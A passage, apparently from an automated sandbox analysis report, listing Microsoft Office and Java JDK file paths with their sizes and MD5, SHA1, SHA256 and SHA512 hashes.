                                                                                                                    SHA256

                                                                                                                    3c337729900dbed8a761ad7a9e5d4ce26ded027d336bea4a569713a754bddca3

                                                                                                                    SHA512

                                                                                                                    5125f42a69f77fda2b0b38e17d485977d0ff74595f2cc3fbe7ed0c6aecf3450affde681b15d594429a560de6e5572db948ae338097df92aadf49dbb4c35df801

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen\TAB_OFF.GIF

                                                                                                                    Filesize

                                                                                                                    400B

                                                                                                                    MD5

                                                                                                                    f9dc7039b8cf8b0a980260210da6e90f

                                                                                                                    SHA1

                                                                                                                    8ae5dfca94a78772f501a6172ac230e2f4402630

                                                                                                                    SHA256

                                                                                                                    261d38b3fd7810f32c59e7c58898f2e2cc82b81c507168c130876371b65fc6b0

                                                                                                                    SHA512

                                                                                                                    d17dc1522f3bce3d77df917f7c015376438656f8b09ea586d707695df6f27b9b4ac85db5c7d5f7faffb52bde14913b70a8cd132063c943145568bae86a52b471

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Swirl\HEADER.GIF

                                                                                                                    Filesize

                                                                                                                    26KB

                                                                                                                    MD5

                                                                                                                    02d1509bfe29725d590b95923d0f8076

                                                                                                                    SHA1

                                                                                                                    7c6d23bb7d70f7353bc51fc517420581021a0b2e

                                                                                                                    SHA256

                                                                                                                    ecc8eae1cb51d64667b74af629c96e4dc1e0d8215901a93c85ec78df9a705247

                                                                                                                    SHA512

                                                                                                                    4ccbb9fa52733d94cb639e5642361e01b68aee87aea534c6e4d4e6b1c8192f1d25d930dc69649a2603db0bb1cf4fe3280fd16d8df5dd44a730262c28be643387

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Swirl\TAB_OFF.GIF

                                                                                                                    Filesize

                                                                                                                    400B

                                                                                                                    MD5

                                                                                                                    612af3d1122ace39219c23f4145ebe19

                                                                                                                    SHA1

                                                                                                                    4fb4ba9e1b48cf08206660183b10ca088f05a4db

                                                                                                                    SHA256

                                                                                                                    6a99599e806bb8d0c5ac7a0b7f0605a3c74f5e21bcfb69bbfa9776fb09d7daad

                                                                                                                    SHA512

                                                                                                                    47436b0307ac1fec6dd7ea36776688f35985488fbea4f701b5b6501d845559805635d6411ffc01ae6f0f168f156e2c292b96a1476678c44991126745e775a953

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\MSOUC_F_COL.HXK

                                                                                                                    Filesize

                                                                                                                    176B

                                                                                                                    MD5

                                                                                                                    3e633af261d3f8b674e5da45ffda700f

                                                                                                                    SHA1

                                                                                                                    75716b53787365682f6219b0b012c2531c1a244b

                                                                                                                    SHA256

                                                                                                                    7dde08a639e447f1d645013747bed7575ae74f76dafb9cd813dc34c661252848

                                                                                                                    SHA512

                                                                                                                    a733e027a11c23d814348596b0e26d6a7f312142c8dda3e63a5ffebd6e723d70a01fc4db9d697b4f5d0fb6973915d855c58253a695a1cfec4925280fb5ece31e

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\MSOUC_K_COL.HXK

                                                                                                                    Filesize

                                                                                                                    176B

                                                                                                                    MD5

                                                                                                                    bd34a2929a464c0529d5282480e3780d

                                                                                                                    SHA1

                                                                                                                    409f7cb6bfcff3418834282fb6cee3b46526c365

                                                                                                                    SHA256

                                                                                                                    84aa3d1f6f0300b02a2e79b318f10c23796729d97db4ee703347f55a10c55f11

                                                                                                                    SHA512

                                                                                                                    fcd7941f3fdf27cdd8af6f43d495c1592ffb155a505ee09f28980097811518e77819e3527f90b9a6db9b6a5dc88630aa21700a37a5376221cb263940ff182026

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\POWERPNT_F_COL.HXK

                                                                                                                    Filesize

                                                                                                                    176B

                                                                                                                    MD5

                                                                                                                    40862c5cca0325b2fc8f32ec89fb82be

                                                                                                                    SHA1

                                                                                                                    a28cc0a552c8328889eef72a06da8c811c6e83e3

                                                                                                                    SHA256

                                                                                                                    7f151baed7d97204c2311cf1a8588c7f63cb8eeaca42234ecb4ba6600bb66456

                                                                                                                    SHA512

                                                                                                                    789066373454a2377c445a42919aa5860d2006a65e3e35e7d1a76b09b551785cbbdd389c00cdb28db6f1634e77ebf2a1d8dcc878fa9e71eb1a22b45a2c8ebc91

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\POWERPNT_K_COL.HXK

                                                                                                                    Filesize

                                                                                                                    176B

                                                                                                                    MD5

                                                                                                                    bb5944009d2e0f26271c3cabe14cc721

                                                                                                                    SHA1

                                                                                                                    0b2ffa945bfb404b0e0637f84406cb5cf709d023

                                                                                                                    SHA256

                                                                                                                    e5092d7981ce72313385c23b3d72b7b121095ac76e2401c5df4d5d5c34cbd41e

                                                                                                                    SHA512

                                                                                                                    491efcc3d89e7d28c6593d3355cd3b4f3e63b453a12e4462a6590c4e93860a38e88269bc469f85d8dc377d67332573f8304e8539b13168f2a3f38cfba294fd24

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\SETLANG_F_COL.HXK

                                                                                                                    Filesize

                                                                                                                    176B

                                                                                                                    MD5

                                                                                                                    b63c223774555b59b365d1d5b96a0275

                                                                                                                    SHA1

                                                                                                                    39eccd45349644e62f97edd52eaa168865f3f981

                                                                                                                    SHA256

                                                                                                                    4425baca3b7226db16afe36250fce586a181c7cd15d5c9bf5c8d4c70f3c2ed0b

                                                                                                                    SHA512

                                                                                                                    b33dff004209256b41c666e7cdeebfe772e106de2b0ef179da1547576d304ff7877af38c19036c4961163baa9c9bef618db6b97e71d9c8f6b075534e13357640

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\SETLANG_F_COL.HXK

                                                                                                                    Filesize

                                                                                                                    114B

                                                                                                                    MD5

                                                                                                                    b8fbbc73ddde31636552ab184b4e398f

                                                                                                                    SHA1

                                                                                                                    5cfbfaea56e979a07c083f2340b10a5894812d78

                                                                                                                    SHA256

                                                                                                                    3c3702253a4695b5bcb18a2565b1d49f9f32f5f9f2442fd1395197970fa34edb

                                                                                                                    SHA512

                                                                                                                    7f0f4b098e0d37ed403be8d54e2dcbc603791ddf00e3a21747c41ecfb829fdf664b6bddda8d51309e1229b197244a1d8ae23e1b3bf3348f99f84a7a8684db8d7

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\SETLANG_K_COL.HXK

                                                                                                                    Filesize

                                                                                                                    176B

                                                                                                                    MD5

                                                                                                                    d2ddcb1955e2ddc9207f363e3eab2346

                                                                                                                    SHA1

                                                                                                                    d5b5df1e442ea036b9104b7b51249e506f9db781

                                                                                                                    SHA256

                                                                                                                    3afe75361dec965ca7152137bf31135133ab91e17e000244d3ca53ed227a95ee

                                                                                                                    SHA512

                                                                                                                    6c2f0050e50b7c92950fa5a1b3d1f5fd08507a33c332dd18779d71d2aec18a05a9ca7b06d698b29a0e08f008cf1de418c891258eb182449deaa9f155261fb90c

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\SETLANG_K_COL.HXK

                                                                                                                    Filesize

                                                                                                                    113B

                                                                                                                    MD5

                                                                                                                    db9742e49c49c505b293a84518e95fa5

                                                                                                                    SHA1

                                                                                                                    406dae0b226900aad2ad2e10d8366651b848c053

                                                                                                                    SHA256

                                                                                                                    1c17b95e5098adb0c0e06aac8a8c7c50c6a5ef1b696465d548c8a922f1d3a653

                                                                                                                    SHA512

                                                                                                                    974917a72b2b3b783bb0ffcbfe0058489ae65ac0aa71ae86d77195780aeb7800848a3158fbe7ad8ddf9b30145d8a1a2c66f72484305ccf363b7981f105be295b

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\DELETE.GIF

                                                                                                                    Filesize

                                                                                                                    688B

                                                                                                                    MD5

                                                                                                                    9581ff2b4bf1e216613b128b36b84051

                                                                                                                    SHA1

                                                                                                                    6a1debdddb031698be7d45a3a82daa27a7e9e63f

                                                                                                                    SHA256

                                                                                                                    0b1b9654c295720716ab1a68366113d74a0b256cb7f457377beef3014423944f

                                                                                                                    SHA512

                                                                                                                    a895cb308d5ee9c89edf400ff9a6273212eff75c0f4fc9f2f42beef10fdd00b021f8d8736e249a9443409f935952880860ccc38bae9ad8a65b97d2a554cf4908

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\ERROR.GIF

                                                                                                                    Filesize

                                                                                                                    928B

                                                                                                                    MD5

                                                                                                                    bbe3f6f8ff2b3a5fe09ade12d3cab6b2

                                                                                                                    SHA1

                                                                                                                    2eaa49c4f91a1f0d86d5293ef64f8e471160f302

                                                                                                                    SHA256

                                                                                                                    59ed989dbf5fa3bb392d0169904515a4fc71ac3a666565041350b99a34dc8847

                                                                                                                    SHA512

                                                                                                                    f841ded855395a2815e54d1f1710a73ce5d329cbb775101301d4790a35638b002bf703d29ee7854b694f65b21f27e8dc7e3f473132de5611bcae325b9e690ee4

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Oasis\TAB_OFF.GIF

                                                                                                                    Filesize

                                                                                                                    544B

                                                                                                                    MD5

                                                                                                                    7477024fe4c31b6005680a557b575f5f

                                                                                                                    SHA1

                                                                                                                    9464d7e89933653dc2594d18316c2ef66de1870f

                                                                                                                    SHA256

                                                                                                                    d31f1292209eb0c99074d528ae66757f0215133845e778c4d6374e36082b93c4

                                                                                                                    SHA512

                                                                                                                    0df353f0a522c2b4cbd5fd568068b2e6ae49456a9ad2f65cb9b7ce982dcd9d1d981e2c66962bbf087fe9ff71c797cfac0c2bd30ebe560723e244337317406ce1

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_alignleft.gif

                                                                                                                    Filesize

                                                                                                                    896B

                                                                                                                    MD5

                                                                                                                    7d8eca0e07741cd6719df50afacbf259

                                                                                                                    SHA1

                                                                                                                    01e212492b6efbafd861ad1b0d51c43ce7e690b1

                                                                                                                    SHA256

                                                                                                                    fde7003b5698965f4bf2393accb2d09b3acadee3a7fd9f5665d966d1c0c6a74b

                                                                                                                    SHA512

                                                                                                                    15ad462c906acff97226bea7bb8d7e44c73cc4881971ee76cffeb49b18a7050f91c5c7a71b26c93222d3571fad3a53172116a2478e3b5ed5893993914940fd82

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_alignright.gif

                                                                                                                    Filesize

                                                                                                                    896B

                                                                                                                    MD5

                                                                                                                    e0f78f4f201a60da11ae6719e8b687cb

                                                                                                                    SHA1

                                                                                                                    ea4e05ba64b07387a0a6eb090e9c38237416a9a5

                                                                                                                    SHA256

                                                                                                                    be172711dacb4e851dd608e04d4037667e030c79ce15f444843390ab9eac519b

                                                                                                                    SHA512

                                                                                                                    221c00c6f55382fad7abf0b8b2290dd16027a7e48a41fe859e4edabbc8977abc02b0eaf13284484b4e86f9e88a4facfa6f7b45bf3ec7be5d8b2d20dfaef81365

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_center.gif

                                                                                                                    Filesize

                                                                                                                    896B

                                                                                                                    MD5

                                                                                                                    c7e9188a2b1c2c786e48e337cbc7e111

                                                                                                                    SHA1

                                                                                                                    0e2e1b192bb60a6eba184c2f5e66e445ccc56f07

                                                                                                                    SHA256

                                                                                                                    53b126bf699605dd1ca238bf6aeffe8260aadce02ae2c1f3bb29151009db4cdd

                                                                                                                    SHA512

                                                                                                                    75ba97fa2956537c9d96fda1c8a7dc504f0430f2a08d7f5d5f28b1aba3828b98a8133261888f03476f52a9063c65ee5c3e130a2290ca1284b799b15652f40e67

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\TAB_ON.GIF

                                                                                                                    Filesize

                                                                                                                    272B

                                                                                                                    MD5

                                                                                                                    3289bdde380cb5b7b320a8956c96c495

                                                                                                                    SHA1

                                                                                                                    23bc4f0927e591e359a8737e7a7c83add594b79f

                                                                                                                    SHA256

                                                                                                                    f8556d355b5135f8747067e194ae933527b61558b841576331229339d8f86a94

                                                                                                                    SHA512

                                                                                                                    e46f64edaee42b3933bc5aedf7f258e02f6ebd2fc9f062f79dda99db7b014844e74d5e6f44a0d222f21a10f747dd2bba12e7cafc0786f5b2dd43b92eb9e2eaf8

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\AddToViewArrowMask.bmp

                                                                                                                    Filesize

                                                                                                                    2KB

                                                                                                                    MD5

                                                                                                                    89fc69582abbe1a57f7beb73c7b8ef50

                                                                                                                    SHA1

                                                                                                                    7ac8e99354ff8c62e3e784ee2b77fe67eda07737

                                                                                                                    SHA256

                                                                                                                    6f8d5dcbcc68888f62cfcb9e8842a62fc7ad50ba9a6c20fbdd15d02f020592d9

                                                                                                                    SHA512

                                                                                                                    8c5f562c3c5a20915d79565c6df7755f22b24f7ba6d8d78debe57331b0f61482c1520edbc6cfa5379e432658d38d17cb3ed2ffc90c56dbea3ebddba9de54aff7

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\BG_ADOBE.GIF

                                                                                                                    Filesize

                                                                                                                    24KB

                                                                                                                    MD5

                                                                                                                    7dae889cd8122a74c8e6601aee944f20

                                                                                                                    SHA1

                                                                                                                    6aba8c15355dd65640189c939ec24cbc45d8cc37

                                                                                                                    SHA256

                                                                                                                    f8d559abf1b3dcede29455c6fc26fcc8a19b4bc375d00de462599be53f3cf97c

                                                                                                                    SHA512

                                                                                                                    a05fc773f78e889acd498e34fef345da310f565c25b616195cffddbaf79741ef8dad2f23e1c2cf629d3d8bf69bb5d9f920c82cc0c4315cebeb3f38d9ac80bd90

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormToolImages.jpg

                                                                                                                    Filesize

                                                                                                                    7KB

                                                                                                                    MD5

                                                                                                                    5ec9f5fca3fdcab172c12975825c0513

                                                                                                                    SHA1

                                                                                                                    747d8bac84c759145b6160a1ffb1bf498df5ba22

                                                                                                                    SHA256

                                                                                                                    41a24078823f19e138391df7ae7885f5db2ffee2e0ac9ce99fac1fbe618e39ab

                                                                                                                    SHA512

                                                                                                                    53ba22bb27e0cf0396394b06624af567d10ceae8729d42b89f68e44cde29873dd0be43912c7d5793ed9173244cf4b512f84714ddd5789653d032e00d2328b18a

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIcons.jpg

                                                                                                                    Filesize

                                                                                                                    5KB

                                                                                                                    MD5

                                                                                                                    f0a470c037cf1b3e1035802536008acd

                                                                                                                    SHA1

                                                                                                                    5bcc11a7ea1780546839789f0fbc3a05810ef5c5

                                                                                                                    SHA256

                                                                                                                    c715d9f70d793f388710ea5675bcdef6b156d6ac4d12dc31bab3a28184a16f3d

                                                                                                                    SHA512

                                                                                                                    b5f3c9f30b04a260835659fb26a593a009d8b33fefb4e45662bfa355fe72f91b8a4c2fa7cb89083fa257f4460a44026a74205cba5c0bf1590a72bde65e450353

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIconsMask.bmp

                                                                                                                    Filesize

                                                                                                                    1KB

                                                                                                                    MD5

                                                                                                                    5a0158e472b16165965e04fe29415b61

                                                                                                                    SHA1

                                                                                                                    2a81c71ed584ab401be8adf104f8512449685715

                                                                                                                    SHA256

                                                                                                                    1184e6228b89773122d15c2891566a531d82e710119f5093b37405653ee7bc78

                                                                                                                    SHA512

                                                                                                                    8e1cff308f6915ab9887340751ae2fd782a6cff7b286c892b2221c253348492d6b9e694db80975bbd26199fb904c99a2b33e75d29ebb6810a3565a1bf6a17897

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\attention.gif

                                                                                                                    Filesize

                                                                                                                    2KB

                                                                                                                    MD5

                                                                                                                    4661755f682d6590af8b7f21b78d59cb

                                                                                                                    SHA1

                                                                                                                    83ad8dc60419ef834a8aa212065e4f6b3847a3a7

                                                                                                                    SHA256

                                                                                                                    1f215a9e804b804f932be49e0ce0d909e5ebb56329c787eba49f4079df217ff9

                                                                                                                    SHA512

                                                                                                                    e3a2524bbafbd0305a6800b00c1267c03e2b92474b21858fba8846b18d4b0d4f4188a3e7d37af7e8c77e741c9c93d14ab0afd6f689568d3e81c275431b0462da

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Casual.gif

                                                                                                                    Filesize

                                                                                                                    5KB

                                                                                                                    MD5

                                                                                                                    6ada4362a00b2599f5ca369f9e99a5ac

                                                                                                                    SHA1

                                                                                                                    0e9acb943944bda0be08792089105c6789d1d7b8

                                                                                                                    SHA256

                                                                                                                    d22a00be72d23cc6e96f235bee33593b7e0e95d9888a0025d006c0f1553cd117

                                                                                                                    SHA512

                                                                                                                    ba4e8e4bb899fba342f3e8f95fce72545ec730685f09bee1c753c62560aef1c26ee89f642b0a9b8d1ccdcd615c2b3267dc6fde6299a554360bf9fe48dccc9f53

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Country.gif

                                                                                                                    Filesize

                                                                                                                    31KB

                                                                                                                    MD5

                                                                                                                    c31c9774b2a5ba2531d1aee943a08343

                                                                                                                    SHA1

                                                                                                                    db0bafb941935d93aaf923816d067ddd51000746

                                                                                                                    SHA256

                                                                                                                    8ecda9f7eba3e9a0349611a3a50ec20303a57d6fad6b4564e4c15cb58700b614

                                                                                                                    SHA512

                                                                                                                    bfec16b77a643ff91011fd77554e18c3588be2bbdd20538fc55ad8a3734118ab123d62b7395ab33cb5ccf8f7987a06c50aa4ff3e55cb87de88fe27b586c9b7b6

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Earthy.gif

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    MD5

                                                                                                                    d3cc987cf07b21af9e1b5ecbf13b7b51

                                                                                                                    SHA1

                                                                                                                    4dc427d74826948cc2823f1a043cbd0a58b98d12

                                                                                                                    SHA256

                                                                                                                    07d89f1128829b12326b3ea5516dc0371ce465b681501d3744248da39efdb914

                                                                                                                    SHA512

                                                                                                                    05f950f7d5adefad7b07436e536d0961e5f3d7be4568ba524dfb4c94d96da75fac5565027820245b9c67dbaf2a2a04e5784b083d7b290eab925872bee8f6ee7e

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_FormsHomePageBlank.gif

                                                                                                                    Filesize

                                                                                                                    19KB

                                                                                                                    MD5

                                                                                                                    cfb4e8370fbdd2413f11533eff673ee0

                                                                                                                    SHA1

                                                                                                                    7d091ecb9353a18475825305b4ca237571ae9e07

                                                                                                                    SHA256

                                                                                                                    9d0da46d8215af023ce24c334e1e449c037e2ff02233396382a1c3d2c64b4a68

                                                                                                                    SHA512

                                                                                                                    1a33d2ff36402181f2a36f982499c01295238ecf42fa0a5cc793a523111011771a1ceb592548efdc0b2021097cde91aa023422467415714392b721c67bc5e0d8

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_GreenTea.gif

                                                                                                                    Filesize

                                                                                                                    21KB

                                                                                                                    MD5

                                                                                                                    1159c6578f771c1b9760d69f1862066d

                                                                                                                    SHA1

                                                                                                                    8877dcfa123e87a65cd62185b3d9e21af1e4a7bc

                                                                                                                    SHA256

                                                                                                                    3ec8a2b6b45f82136b832d457b63cbd4bdb973c006a9af6365497100da60b886

                                                                                                                    SHA512

                                                                                                                    765bc1fd4a15c2920c16b2c445b1cf0c53d4b514eff3b6cd74d474d7651e4093e07827aa349b95306c28f672a264521744a605859a70614521706ff735839e37

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Groove.gif

                                                                                                                    Filesize

                                                                                                                    160B

                                                                                                                    MD5

                                                                                                                    c5d817ec381aa9f1da0ca06b59054928

                                                                                                                    SHA1

                                                                                                                    70c214dbc5fce4e2aa9bcf99b1ec1912d80ef847

                                                                                                                    SHA256

                                                                                                                    71da2abb4a9c4e0b74f1674aeeca48eea3ba48d915edcea85ee67bdbb064a991

                                                                                                                    SHA512

                                                                                                                    ab99308d7b225efcac1acbe7a9540128d4baaa3dd51719cf0ad9c067bafd38d66cfb07baed9f057872945c9fc825a7609b473dbeffdf5fb426f033f720e2d206

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_LightSpirit.gif

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    MD5

                                                                                                                    6664ec069d89cb16884476efebbd2934

                                                                                                                    SHA1

                                                                                                                    d2a2a7553ef7288ac859de6d3d2d9af0ae072485

                                                                                                                    SHA256

                                                                                                                    b44d48a8abdd3efa8870f6bf37b17a0c82577173871a9e68756877eff30aa6ad

                                                                                                                    SHA512

                                                                                                                    09b980275cec4273a8e980634f03b6188653de49e40126d3b1da296ba5c6c72a095fc6e9a2b4831d15b93ab3b1bcb78d331f43e7743be29aab78a53c7b76dbf9

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_OliveGreen.gif

                                                                                                                    Filesize

                                                                                                                    15KB

                                                                                                                    MD5

                                                                                                                    cf5119cb46fa859c5bcd9a974c97473b

                                                                                                                    SHA1

                                                                                                                    0038ffd58eb1b6d6182168dc0ba0bdfc45aab5dd

                                                                                                                    SHA256

                                                                                                                    ba596ac69aa40e0fcff0a6e43d1ed5bc898352c21e01318268bd5579f6013c57

                                                                                                                    SHA512

                                                                                                                    893af7df2f6786156d0b64c30f12e1b091d706f539b90c16e3364cd4ed3f84a4edb564d64635de48bd35a2ed6a6e2191aff99c209fa1a3cd72eb12a1017c1bae

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Premium.gif

                                                                                                                    Filesize

                                                                                                                    6KB

                                                                                                                    MD5

                                                                                                                    86f2631594941e9da3af200b46927941

                                                                                                                    SHA1

                                                                                                                    c6016942f567f83f7ab75cdf914e383d53161916

                                                                                                                    SHA256

                                                                                                                    55fe9ce019a239b2205ec338fb21c8767aa56ff9e9547802212505db2f048d4c

                                                                                                                    SHA512

                                                                                                                    31bcbd10fbb16cc7a23e135825f8c2b27cd9c837c0e1ddb952f177c5d7781a378302b9e6f8ab1a60eb810df8af05bb883cca56f56ccfb7316dc837a3fdd05054

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_SlateBlue.gif

                                                                                                                    Filesize

                                                                                                                    20KB

                                                                                                                    MD5

                                                                                                                    7d1bc7766fd197d11d5146cc6a6331f6

                                                                                                                    SHA1

                                                                                                                    b83129e522714b90eb58fa53846c84fc8932d3cd

                                                                                                                    SHA256

                                                                                                                    0fa3fd70f53e6127e45b657de2ce7309a4d7fa8c978a30fe5203ea1c550248f3

                                                                                                                    SHA512

                                                                                                                    4c1f973250a71f4696e74f35ddd4ab6927b0b65c5e85495bbf1c5a0f88d75980a7547a8767691bcf2ad3d813dc9bded8ebeaf3a1150b87ee0a4eb6f7e5dc0d17

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_TexturedBlue.gif

                                                                                                                    Filesize

                                                                                                                    6KB

                                                                                                                    MD5

                                                                                                                    c8ed665cd5ee422cdc1ab417b868eeb5

                                                                                                                    SHA1

                                                                                                                    c061734d4e2f1f82b809a331c89ad8c9bd41189f

                                                                                                                    SHA256

                                                                                                                    bc928423e20779bcc92c72b5fe55573fd6be784e01e33a86768f09560ac0ac17

                                                                                                                    SHA512

                                                                                                                    a426c5242de00f259fdfa7f10fc08d61c6771d9a6ce0456e01ec961e3fdb2c66b94a369c771eafa44241bf2ec237ea434e3716e17515438e8f8c2967d585b0f7

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_VelvetRose.gif

                                                                                                                    Filesize

                                                                                                                    15KB

                                                                                                                    MD5

                                                                                                                    68a7a7d2db01ca7b33bcdaec05d600bb

                                                                                                                    SHA1

                                                                                                                    b819de9b25db45b3a14db02fb514beb324cf52a0

                                                                                                                    SHA256

                                                                                                                    364262979cb5563773325c4ea3d8c935bc6f55cc32b82112dc471596b7ec0eab

                                                                                                                    SHA512

                                                                                                                    58b36ccc9f0091a4da932469089aa776e225f7bfc82d486b5ae255761183322df888750193ce31b2226cbf238aa7e9454ff865584ca42f4bc794af75772148e9

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\Microsoft.Office.InfoPath.xml

                                                                                                                    Filesize

                                                                                                                    247KB

                                                                                                                    MD5

                                                                                                                    898aa62e2203c47d74e8af608703d06b

                                                                                                                    SHA1

                                                                                                                    3372d32aab2e84f6688e0045c95796906d580c20

                                                                                                                    SHA256

                                                                                                                    bbe8ffb2ac832aac6472bf4e881e44b3d69e40775fcdb6cf717708997f930c1c

                                                                                                                    SHA512

                                                                                                                    6ac437781867645dee1d76146e8240b4e314da739413240b63270c0056a8784ae7ff41d027b20c23843a4b45bb9c73c544e4db069cac114f664aacc27903da16

                                                                                                                  • C:\Program Files\Java\jdk1.7.0_80\jre\COPYRIGHT

                                                                                                                    Filesize

                                                                                                                    3KB

                                                                                                                    MD5

                                                                                                                    4bc018607467a6b31437260b800008cb

                                                                                                                    SHA1

                                                                                                                    15ca4476a27ddba4064ede55cf4b03e56b7c9127

                                                                                                                    SHA256

                                                                                                                    b80780db1dea105e6f23317d0b5deadaca171713365b7a249d262d690c1e3f1a

                                                                                                                    SHA512

                                                                                                                    30a4fe3668b6f759c5954a9104ee695693cccffd6e99e07b98d43bbfe9e3ad3d7793715bfa7992a33c0430bcdd11264f7a13afb08b539bd073c732aba79c8883

                                                                                                                  • C:\Program Files\Java\jdk1.7.0_80\jre\LICENSE

                                                                                                                    Filesize

                                                                                                                    96B

                                                                                                                    MD5

                                                                                                                    787166a1e60bd2ba6918e4a9c7ab66d2

                                                                                                                    SHA1

                                                                                                                    ba43aad8caf00beba3400bf9a5818e0b4067f7a2

                                                                                                                    SHA256

                                                                                                                    978773a7db73bd6119a490c12dd3b65b0530e56200354c87fdfb6a936519bb9f

                                                                                                                    SHA512

                                                                                                                    5fd1b9d334abc61ba1d096e09428c8d52457a8f25bbf35e3f1e4f2286e1249611a4a086c838aabcb1031ba7fbab90ab455045b4d84ea483cd991ae250eda533a

                                                                                                                  • C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME.txt.mp3

                                                                                                                    Filesize

                                                                                                                    173KB

                                                                                                                    MD5

                                                                                                                    995006d9d2a8ca715fd23cd22b03e48c

                                                                                                                    SHA1

                                                                                                                    9a9ac90c4fb341856bee3271c438f7785d2449ce

                                                                                                                    SHA256

                                                                                                                    3db39ebdacbd03d0e59f01de863b19bb7dcb67de3cbc99d0cdbe5fae15c9c6eb

                                                                                                                    SHA512

                                                                                                                    159f41148889181ed325d4b79577666c38f30cc2d82e0dd03decf5c94d47cb406968dce8f3fb916a2f7f88d82571b64421ac8ca22ceee5262c5b13d8e78b8cd0

                                                                                                                  • C:\Program Files\Java\jdk1.7.0_80\jre\bin\msvcr100.dll

                                                                                                                    Filesize

                                                                                                                    809KB

                                                                                                                    MD5

                                                                                                                    d791ca23f426ba8d591d4384e04a4890

                                                                                                                    SHA1

                                                                                                                    7fd37501e9dedf1cc8646b1f0077f0889f2f6143

                                                                                                                    SHA256

                                                                                                                    6d5edff0ae58f57671280867ccf81eb7f6907482be26aef5c2284b8c00a3ac16

                                                                                                                    SHA512

                                                                                                                    3e4fc9a784fa90067fba8921a0ed62947fcff647d8bc91d40c6a11c990bcea83319648a41ea00d8bd2a9da676353fb9db3ce6a607c8fe5afa0ca2c9f66309d00

                                                                                                                  • C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\CET

                                                                                                                    Filesize

                                                                                                                    1KB

                                                                                                                    MD5

                                                                                                                    15665f5dc00d38f0cb920025d23b5792

                                                                                                                    SHA1

                                                                                                                    623040ff5cc7dd16a78aaf9d56677c7fe510dbc9

                                                                                                                    SHA256

                                                                                                                    3bc3b60bd14010392a7fb6d2e17c3abe98f5ed1d8d942845ece72aeaf17bfbf3

                                                                                                                    SHA512

                                                                                                                    fd949638e1cbaff5a3ec269f6f561a5dc9faa2f9ca464178af0f426226e3e9c6a409475184b50469a648536741b13251de6769d65acc2da178746a8ef2478b39

                                                                                                                  • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\MANIFEST.MF

                                                                                                                    Filesize

                                                                                                                    192B

                                                                                                                    MD5

                                                                                                                    87c34987eae2842adf5eb463b0c7fb0c

                                                                                                                    SHA1

                                                                                                                    c2813239203eafacd706105338db47944802d8b5

                                                                                                                    SHA256

                                                                                                                    1bdb91573513164749ad374eeeb11de51e889f5871748386c0b87c8ad5d985d3

                                                                                                                    SHA512

